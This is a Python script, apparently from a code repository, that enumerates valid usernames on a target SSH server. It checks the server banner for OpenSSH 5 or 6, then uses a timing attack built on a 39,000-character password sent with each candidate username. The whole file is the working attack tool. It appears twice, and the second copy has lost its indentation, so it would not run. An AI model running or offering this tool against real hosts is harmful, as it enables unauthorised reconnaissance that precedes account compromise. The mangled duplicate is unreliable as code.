llandeilocymro/ssh_username_enum.py

## ssh_username_enum.py
#!/usr/bin/python
# EDW - OpenSSH Username enum

import sys
import paramiko
import time
import optparse
import re
import signal
from socket import *

p = optparse.OptionParser("usage: %prog host user", version="%prog 0.2")
p.add_option("-H", "--host", dest="host", type="string", help="specify hostname to run on")
p.add_option("-u", "--userfile", dest="user", type="string", help="file of usernames")
p.add_option("-p", "--port", dest="port", type="int", default=22, help="port number, default is 22")

(options, args) = p.parse_args()

host = options.host
user = options.user
port = options.port
passw = 'A'*39000

def main():
	timeStart = timeDone = 0

	s = socket(AF_INET, SOCK_STREAM)
	s.connect((host, port))
	s.send("Cymru_am_byth")

	data = s.recv(1024)
	ndata = data.rstrip()

	if not re.search(r"-OpenSSH_(5|6)",data):
        	print "This version (%s) is not vulnerable to the timing attack" %ndata
        	s.close()
		exit()
	else:
        	print "This version (%s) looks vulnerable, lets try......." %ndata
		s.close()

	try:
		u = open(user).read().splitlines()
	except IOError as e:
		print "I/O error({0}): {1}".format(e.errno, e.strerror)
		sys.exit()

	for n in u:
		try:
			ssh = paramiko.SSHClient()
			ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
			tstart = int(time.time())
			ssh.connect(host,username=n,password=passw,port=port)
			ssh.close()

		except paramiko.BadAuthenticationType, e:
			print e
			sys.exit(1)

		except paramiko.SSHException,e:
			tdone = int(time.time())
			tres = tdone-tstart

		if tres > 15:
       			print "[*] User %s exists on %s - %i" %(n,host,tres)
		else:
       			print "User %s does not exist on %s - %i" %(n,host,tres)

def signal_handler(signal, frame):
	print "\nCtrl+C pressed.. aborting..."
	exit()

if __name__ == '__main__':
    signal.signal(signal.SIGINT, signal_handler)
    main()
	#!/usr/bin/python
	# EDW - OpenSSH Username enum

	import sys
	import paramiko
	import time
	import optparse
	import re
	import signal
	from socket import *

	p = optparse.OptionParser("usage: %prog host user", version="%prog 0.2")
	p.add_option("-H", "--host", dest="host", type="string", help="specify hostname to run on")
	p.add_option("-u", "--userfile", dest="user", type="string", help="file of usernames")
	p.add_option("-p", "--port", dest="port", type="int", default=22, help="port number, default is 22")

	(options, args) = p.parse_args()

	host = options.host
	user = options.user
	port = options.port
	passw = 'A'*39000

	def main():
	timeStart = timeDone = 0

	s = socket(AF_INET, SOCK_STREAM)
	s.connect((host, port))
	s.send("Cymru_am_byth")

	data = s.recv(1024)
	ndata = data.rstrip()

	if not re.search(r"-OpenSSH_(5\|6)",data):
	print "This version (%s) is not vulnerable to the timing attack" %ndata
	s.close()
	exit()
	else:
	print "This version (%s) looks vulnerable, lets try......." %ndata
	s.close()

	try:
	u = open(user).read().splitlines()
	except IOError as e:
	print "I/O error({0}): {1}".format(e.errno, e.strerror)
	sys.exit()

	for n in u:
	try:
	ssh = paramiko.SSHClient()
	ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	tstart = int(time.time())
	ssh.connect(host,username=n,password=passw,port=port)
	ssh.close()

	except paramiko.BadAuthenticationType, e:
	print e
	sys.exit(1)

	except paramiko.SSHException,e:
	tdone = int(time.time())
	tres = tdone-tstart

	if tres > 15:
	print "[*] User %s exists on %s - %i" %(n,host,tres)
	else:
	print "User %s does not exist on %s - %i" %(n,host,tres)

	def signal_handler(signal, frame):
	print "\nCtrl+C pressed.. aborting..."
	exit()

	if __name__ == '__main__':
	signal.signal(signal.SIGINT, signal_handler)
	main()